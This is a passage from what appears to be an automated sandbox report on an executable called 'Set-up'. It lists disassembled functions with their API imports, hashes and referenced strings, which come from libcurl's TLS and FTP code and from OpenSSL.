                          • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                          • API String ID: 838718518-248801092
                          • Opcode ID: 651b6f3e7eb4275594e45a5a14775b7a567e8cfd60b25702fbfaaf99d70fcfad
                          • Instruction ID: b8b72d3aca48509139bc0a9589efe15ed3222e54461363581d39f80eb1392504
                          • Opcode Fuzzy Hash: 651b6f3e7eb4275594e45a5a14775b7a567e8cfd60b25702fbfaaf99d70fcfad
                          • Instruction Fuzzy Hash: 1103D6B59083406BE720AB10ED42B6F77A8AF95708F084829FC4E56383FB75E954D793
                          APIs
                          • localeconv.MSVCRT ref: 00DEE0B3
                          • localeconv.MSVCRT ref: 00DEE0BE
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DEE149
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DEE179
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE1D8
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE1FA
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DEE20F
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DEF886
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free$isspacelocaleconv$_errno
                          • String ID: $d$nil)
                          • API String ID: 577766270-394766432
                          • Opcode ID: 157382de4443ef8e60d530d92ebcfd94b5b560fcfb783499269a5ddf7c0f0629
                          • Instruction ID: ca05c10963d5fdff0ff24ed572036ece29526d133505319fd7d77c41c27804a5
                          • Opcode Fuzzy Hash: 157382de4443ef8e60d530d92ebcfd94b5b560fcfb783499269a5ddf7c0f0629
                          • Instruction Fuzzy Hash: 49137E706083858FC720EF2AC48062ABBE1BF89714F59892DF9D59B351D771EC45CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                          • API String ID: 0-1921080684
                          • Opcode ID: 49cffd10ac37f0b7164c08feebee68cb1e4c44ce05516b5d7a899155eb44c781
                          • Instruction ID: 4114181b07d377d9d0cc2ba4c6e0b70d81785d401bbb0e58286061b29b72226a
                          • Opcode Fuzzy Hash: 49cffd10ac37f0b7164c08feebee68cb1e4c44ce05516b5d7a899155eb44c781
                          • Instruction Fuzzy Hash: E852E2B1A04300ABD724DB24DC46B6B77E9AF96704F08482DF889CB2C2E775DD45C7A2
                          APIs
                          • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00A6E6F1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: fputc
                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                          • API String ID: 1992160199-2555271450
                          • Opcode ID: 3c99607d7fc0b32f858747d060b362168a978972c0e50aa0da5bc23e197d61d4
                          • Instruction ID: bc0d1324fd9c29b3cc0ea19053649de5773fbb1d73bea322211cfbcb1f78fb58
                          • Opcode Fuzzy Hash: 3c99607d7fc0b32f858747d060b362168a978972c0e50aa0da5bc23e197d61d4
                          • Instruction Fuzzy Hash: 6C829A75A083419FDB14CF29D88072BB7F1EFC5764F288A2DE9A997291D730DC058B92
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00CF0374
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00CF0395
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00CF049D
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00CF04E7
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00CF055F
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00CF057A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CF0618
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00CF06E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                          • API String ID: 1297977491-3776850024
                          • Opcode ID: fbf6dfe28b66fa5a0181ee71ae45104819680c83d06223c845ff8f69eeea40e9
                          • Instruction ID: 90d2cd64fd6687ea246a92c25ee7e87151464fe0bfb9a546d0c02c65970f36dc
                          • Opcode Fuzzy Hash: fbf6dfe28b66fa5a0181ee71ae45104819680c83d06223c845ff8f69eeea40e9
                          • Instruction Fuzzy Hash: 2C52AF719087858BD711CF29C841BABB7E4BFD9344F188A2DF9C892242E774DA44DB93
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00C3E28D
                          • FindNextFileW.KERNEL32(?,00000000), ref: 00C3E2BB
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 00C3E30A
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00C3E3C7
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C3E3DD
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 00C3E3F8
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 00C3E41A
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00C3E44E
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00C3E563
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00C3E571
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                          • String ID:
                          • API String ID: 1393009926-0
                          • Opcode ID: f18387b559429014fd5e9e76dd2fa1895f79e2202dc3b53a48b60f914c8cd2a3
                          • Instruction ID: 0444a1ae28b431bf656aaa7048a9613c99999f4b8bfe55ca5ea4a329f8b4c6f6
                          • Opcode Fuzzy Hash: f18387b559429014fd5e9e76dd2fa1895f79e2202dc3b53a48b60f914c8cd2a3
                          • Instruction Fuzzy Hash: F8914731620B419FD3209F39CC85B66BBB5FF85324F184668F8658B6E2E735E950CB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                          • API String ID: 0-2568808753
                          • Opcode ID: 3fd3e8b4fd1a6999b70ba494e44c1533b3f6ff655be1278d8272e6e962f2add1
                          • Instruction ID: 71aa196f1c5eac7c1bea58716356ac5cba8296d3ef44c346ed5e1a1c4eb32857
                          • Opcode Fuzzy Hash: 3fd3e8b4fd1a6999b70ba494e44c1533b3f6ff655be1278d8272e6e962f2add1
                          • Instruction Fuzzy Hash: 38E1B071608305ABD720AF54D882B2FF7E5EF84744F0448AEFA8997352F771E8009B86
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DD06A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: $
                          • API String ID: 3510742995-227171996
                          • Opcode ID: d8c252e8d7ad18d203f1d67cb4ab76ec2f4923b33d5ca8497cb455f00eb37043
                          • Instruction ID: 3e0dba9ef105b6fa5cc9d4d010da1994fe7a6e6a527f2106102b4588bc11fa9a
                          • Opcode Fuzzy Hash: d8c252e8d7ad18d203f1d67cb4ab76ec2f4923b33d5ca8497cb455f00eb37043
                          • Instruction Fuzzy Hash: 03D29E72A087559FC724CF28C88066AFBE1EFC4304F198A2EE9D997351D770E945CB92
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CA8A66
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00CA8A88
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00CA8B45
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CA8B59
                          Strings
                          • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00CA8A42, 00CA8F13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                          • API String ID: 1297977491-3184136495
                          • Opcode ID: e6212a8b2bb6d8b81df7b64d5961a633aeb7072c8feb07fedf524cfd352745d5
                          • Instruction ID: 0a1d59919ef3de6920be548c5aa350bda422753212a72eb1a164a78f079d0b31
                          • Opcode Fuzzy Hash: e6212a8b2bb6d8b81df7b64d5961a633aeb7072c8feb07fedf524cfd352745d5
                          • Instruction Fuzzy Hash: 4E22D2719087429FD711CF24C881BABB7E5FF96348F044A1DF8A597242DB30EA48CB62
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00DE47A3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE47C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DE4800
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE4D16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _strdupmemcpystrchrstrlen
                          • String ID: H$xn--
                          • API String ID: 1602650251-4022323365
                          • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                          • Instruction ID: 2f5803b55a44e4d18f12baf444a8a9fc90686bd1acaeedda9bd7ca7c27d36f46
                          • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                          • Instruction Fuzzy Hash: 90E139716087958FD718EE2AD8C072AB7D2ABC4314F188A3DD9D687381D774DC0587A6
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00D6C090
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00D6C0BE
                          Strings
                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00D6C0D2, 00D6C266
                          • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00D6C433
                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00D6C0CD, 00D6C26B
                          • crypto/evp/encode.c, xrefs: 00D6C42E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                          • API String ID: 3510742995-2458911571
                          • Opcode ID: 25a240eae8cb10270cb024830c413ff362eef8e04ad141e8585ac4ca0959dd25
                          • Instruction ID: 55e25b0e6f5b28bdcd7e7cc9ac11befc0fb3f4640693f43ce9f41b2930506781
                          • Opcode Fuzzy Hash: 25a240eae8cb10270cb024830c413ff362eef8e04ad141e8585ac4ca0959dd25
                          • Instruction Fuzzy Hash: F7C1067561C3958FC715DF28C49073ABBE1AF9A304F0889ADF8D58B382D635E905CB62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
